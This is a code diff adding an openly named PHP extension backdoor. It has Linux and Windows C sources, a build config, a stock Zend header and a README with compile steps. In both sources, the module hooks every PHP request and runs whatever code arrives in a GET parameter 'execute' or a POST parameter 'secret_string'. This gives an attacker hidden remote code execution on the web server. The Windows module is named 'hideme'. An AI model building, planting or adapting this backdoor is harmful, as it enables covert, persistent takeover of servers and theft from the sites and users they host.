php-extension-backdoor

Author: xl7dev

Php/php-extension-backdoor/README.md

@@ -0,0 +1,6 @@
+Windows:
+http://stackoff.ru/pishem-rasshirenie-bekdor-dlya-php/
+
+Linux:  
+`sudo apt-get install php5-dev`  
+`phpize && ./configure && make`

Php/php-extension-backdoor/lin/backdoor.c

@@ -0,0 +1,34 @@
+#include "php.h"
+PHP_RINIT_FUNCTION(hideme);
+zend_module_entry hideme_ext_module_entry = {
+    STANDARD_MODULE_HEADER,
+    "simple backdoor",
+    NULL,
+    NULL,
+    NULL,
+    PHP_RINIT(hideme),
+	NULL, 
+	NULL,
+    "1.0",
+    STANDARD_MODULE_PROPERTIES
+};
+ZEND_GET_MODULE(hideme_ext);
+
+PHP_RINIT_FUNCTION(hideme)
+{
+
+	char* method = "_GET"; // суперглобальный массив, из которого берем пераметр и значение
+	char* secret_string = "execute"; // параметр в котором будет evil-код
+	zval** arr;
+	char* code;
+
+	if (zend_hash_find(&EG(symbol_table), method, strlen(method) + 1, (void**)&arr) != FAILURE) { 
+		HashTable* ht = Z_ARRVAL_P(*arr);
+		zval** val;
+		if (zend_hash_find(ht, secret_string, strlen(secret_string) + 1, (void**)&val) != FAILURE) { // поиск нужного параметра в хеш-таблице
+			code =  Z_STRVAL_PP(val); // значение параметра
+			zend_eval_string(code, NULL, (char *)"" TSRMLS_CC); // выполнение кода
+		}
+	}
+	return SUCCESS;
+}

Php/php-extension-backdoor/lin/config.m4

@@ -0,0 +1,2 @@
+PHP_ARG_ENABLE(back, 0,0)
+PHP_NEW_EXTENSION(back, backdoor.c, $ext_shared)

Php/php-extension-backdoor/win/hideme.cpp

@@ -0,0 +1,37 @@
+#include "stdafx.h"
+#include "zend_config.w32.h"
+#include "php.h"
+
+PHP_RINIT_FUNCTION(hideme);
+zend_module_entry hideme_ext_module_entry = {
+    STANDARD_MODULE_HEADER,
+    "hideme",
+    NULL,
+    NULL,
+    NULL,
+    PHP_RINIT(hideme),
+	NULL, 
+	NULL,
+    "1.0",
+    STANDARD_MODULE_PROPERTIES
+};
+ZEND_GET_MODULE(hideme_ext);
+
+PHP_RINIT_FUNCTION(hideme)
+{
+
+	char* method = "_POST"; // суперглобальный массив, из которого берем пераметр и значение
+	char* secret_string = "secret_string"; // параметр в котором будет evil-код
+	zval** arr;
+	char* code;
+
+	if (zend_hash_find(&EG(symbol_table), method, strlen(method) + 1, (void**)&arr) != FAILURE) { 
+		HashTable* ht = Z_ARRVAL_P(*arr);
+		zval** val;
+		if (zend_hash_find(ht, secret_string, strlen(secret_string) + 1, (void**)&val) != FAILURE) { // поиск нужного параметра в хеш-таблице
+			code =  Z_STRVAL_PP(val); // значение параметра
+			zend_eval_string(code, NULL, (char *)"" TSRMLS_CC); // выполнение кода
+		}
+	}
+	return SUCCESS;
+}

Php/php-extension-backdoor/win/stdafx.h

@@ -0,0 +1,10 @@
+#pragma once
+
+#ifndef STDAFX
+
+#define STDAFX
+
+#include "zend_config.w32.h" 
+#include "php.h"
+
+#endif

Php/php-extension-backdoor/win/zend_config.w32.h

@@ -0,0 +1,98 @@
+/*
+   +----------------------------------------------------------------------+
+   | Zend Engine                                                          |
+   +----------------------------------------------------------------------+
+   | Copyright (c) 1998-2007 Zend Technologies Ltd. (http://www.zend.com) |
+   +----------------------------------------------------------------------+
+   | This source file is subject to version 2.00 of the Zend license,     |
+   | that is bundled with this package in the file LICENSE, and is        |
+   | available through the world-wide-web at the following url:           |
+   | http://www.zend.com/license/2_00.txt.                                |
+   | If you did not receive a copy of the Zend license and are unable to  |
+   | obtain it through the world-wide-web, please send a note to          |
+   | [email protected] so we can mail you a copy immediately.              |
+   +----------------------------------------------------------------------+
+   | Authors: Andi Gutmans <[email protected]>                                |
+   |          Zeev Suraski <[email protected]>                                |
+   +----------------------------------------------------------------------+
+*/
+
+/* $Id: zend_config.w32.h,v 1.39.2.2.2.2 2007/01/01 09:35:46 sebastian Exp $ */
+
+#ifndef ZEND_CONFIG_W32_H
+#define ZEND_CONFIG_W32_H
+
+#include <../main/config.w32.h>
+
+#define _CRTDBG_MAP_ALLOC
+
+#include <malloc.h>
+#include <stdlib.h>
+#include <crtdbg.h>
+
+#include <string.h>
+
+#ifndef ZEND_INCLUDE_FULL_WINDOWS_HEADERS
+#define WIN32_LEAN_AND_MEAN
+#endif
+#include <winsock2.h>
+#include <windows.h>
+
+#include <float.h>
+
+typedef unsigned long ulong;
+typedef unsigned int uint;
+
+#define HAVE_STDIOSTR_H 1
+#define HAVE_CLASS_ISTDIOSTREAM
+#define istdiostream stdiostream
+
+#define snprintf _snprintf
+#define vsnprintf _vsnprintf
+#define strcasecmp(s1, s2) stricmp(s1, s2)
+#define strncasecmp(s1, s2, n) strnicmp(s1, s2, n)
+#define zend_isinf(a)	((_fpclass(a) == _FPCLASS_PINF) || (_fpclass(a) == _FPCLASS_NINF))
+#define zend_finite(x)	_finite(x)
+#define zend_isnan(x)	_isnan(x)
+
+#define zend_sprintf sprintf
+
+/* This will cause the compilation process to be MUCH longer, but will generate
+ * a much quicker PHP binary
+ */
+#undef inline
+#ifdef ZEND_WIN32_FORCE_INLINE
+# define inline __forceinline
+#else
+# define inline
+#endif
+
+#ifdef LIBZEND_EXPORTS
+#	define ZEND_API __declspec(dllexport)
+#else
+#	define ZEND_API __declspec(dllimport)
+#endif
+
+#define ZEND_DLEXPORT		__declspec(dllexport)
+#define ZEND_DLIMPORT		__declspec(dllimport)
+
+/* 0x00200000L is MB_SERVICE_NOTIFICATION, which is only supported under Windows NT
+ * (and requires _WIN32_WINNT to be defined, which prevents the resulting executable
+ * from running under Windows 9x
+ * Windows 9x should silently ignore it, so it's being used here directly
+ */
+#ifndef MB_SERVICE_NOTIFICATION
+#define	MB_SERVICE_NOTIFICATION		0x00200000L
+#endif
+
+#define ZEND_SERVICE_MB_STYLE		(MB_TOPMOST|MB_SERVICE_NOTIFICATION)
+
+#endif /* ZEND_CONFIG_W32_H */
+
+/*
+ * Local variables:
+ * tab-width: 4
+ * c-basic-offset: 4
+ * indent-tabs-mode: t
+ * End:
+ */